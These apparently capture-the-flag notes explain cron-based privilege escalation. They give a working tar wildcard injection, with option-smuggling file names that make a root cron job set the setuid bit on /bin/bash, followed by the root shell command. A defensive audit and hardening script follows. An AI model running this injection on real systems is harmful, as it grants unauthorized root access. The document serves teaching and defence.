- Cron jobs are used to run scripts or binaries at specific times.
- By default, they run with the privileges of their owner, not of the current user.
- If a scheduled task runs with root privileges and we can change the script it runs, then our script will run with root privileges.
- Cron job configurations are stored in `crontabs` (cron tables), which show when each task will next run.
- If the full path of the script is not defined, cron will look through the directories listed in the PATH variable in the /etc/crontab file.
- If the file scheduled to run has no "execute" permission set, it will not be run by the cron job even though it is listed in the crontab.

# Wildcard Injection

```bash
andre@cmess:~/backup$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*/2 * * * * root cd /home/andre/backup && tar -zcf /tmp/andre_backup.tar.gz *
```

- The crontab entry runs as root.
- The `tar` command uses `*` -> every file in the current directory is passed as an argument.
- Because of how `tar` parses its arguments, a file name can be used to inject an option that executes a shell script.
##### Exploit

```bash
cd /home/andre/backup

# create the malicious file
echo 'chmod +s /bin/bash' > shell.sh
chmod +x shell.sh

# create the trigger files
touch "--checkpoint=1"
touch "--checkpoint-action=exec=sh shell.sh"

# if creating the trigger files gives an error,
# tell touch that these are file names, not options
touch -- '--checkpoint=1'
touch -- '--checkpoint-action=exec=sh shell.sh'

# or
touch /home/andre/backup --checkpoint=1
touch /home/andre/backup --checkpoint-action=exec=sh\ shell.sh
```

- `--checkpoint=1`: triggers a checkpoint after each file is processed.
- `--checkpoint-action=exec=sh shell.sh`: runs `sh shell.sh` every time a checkpoint occurs.
- As a result, `tar` runs `chmod +s /bin/bash` while it is archiving, which creates a **setuid bash**.

##### Getting a shell

- After 2 minutes, check with `ls -l`
- `-rwsr-xr-x 1 root root 1113504 Apr 10 14:58 /bin/bash`
- `/bin/bash -p`
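The defender's side of the two points above (a root cron entry that expands an unquoted `*`, and cron scripts that someone other than root can edit), as an added example that is not part of the original write-up: an audit of crontab text for bare glob arguments, the hardened `tar -C DIR .` form that never lets a file name reach `tar` as an argument, and a scan for group- or world-writable scripts. The sample crontab text, the temporary directories and the file names are constructed for the demo.

```bash
#!/bin/sh
# Added example (not from the original write-up). Constructed inputs only.

# Constructed sample: the relevant lines from the page's /etc/crontab.
SAMPLE_CRONTAB='# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
*/2 * * * * root cd /home/andre/backup && tar -zcf /tmp/andre_backup.tar.gz *'

# Print each system-crontab entry whose command contains a bare glob token
# ("*" or "*.ext"). Fields 1-5 are the schedule and field 6 the user, so the
# "*/2" and "*" schedule fields are never mistaken for a glob in the command.
find_glob_entries() {
    printf '%s\n' "$1" | awk '
        /^[[:space:]]*#/ || /^[[:space:]]*$/ { next }
        {
            for (i = 7; i <= NF; i++)
                if ($i ~ /^\*(\.[A-Za-z0-9]+)?$/) { print $0; break }
        }'
}

# Hardened form: "tar ... -C DIR ." instead of "cd DIR && tar ... *".
# The shell expands no glob, so no file name becomes a tar argument; a name
# that starts with "--" is stored as an ordinary member. Prints the member
# list of the resulting archive.
safe_archive_members() {
    tmp=$(mktemp -d) || return 1
    mkdir "$tmp/src"
    printf 'data\n' > "$tmp/src/notes.txt"
    : > "$tmp/src/--looks-like-an-option"   # constructed option-like file name
    tar -zcf "$tmp/backup.tar.gz" -C "$tmp/src" .
    tar -tzf "$tmp/backup.tar.gz"
    rm -rf "$tmp"
}

# List files under a cron script directory that a non-owner could modify
# (group- or world-writable). Argument: the directory to scan.
writable_scripts() {
    find "$1" -type f \( -perm -020 -o -perm -002 \) 2>/dev/null
}

# Constructed stand-in for /etc/cron.daily: one sane script, one loose one.
# Prints the names that writable_scripts flags.
demo_writable_scripts() {
    tmp=$(mktemp -d) || return 1
    printf '#!/bin/sh\n' > "$tmp/safe.sh";  chmod 0755 "$tmp/safe.sh"
    printf '#!/bin/sh\n' > "$tmp/loose.sh"; chmod 0777 "$tmp/loose.sh"
    writable_scripts "$tmp" | sed "s#^$tmp/##"
    rm -rf "$tmp"
}

# Usage
echo "== crontab entries with a bare glob =="
find_glob_entries "$SAMPLE_CRONTAB"
echo "== members of the hardened archive =="
safe_archive_members
echo "== cron scripts writable by non-owners =="
demo_writable_scripts
```

`tar -zcf out.tar.gz -- *` would also stop `tar` from parsing option-like names, but the glob is still expanded by the shell, so the `-C DIR .` form (which also catches dotfiles that `*` skips) is the cleaner fix. On a real host, run `find_glob_entries "$(cat /etc/crontab)"` and `writable_scripts /etc/cron.d` (and the `cron.hourly`/`daily`/`weekly`/`monthly` directories) instead of the constructed inputs.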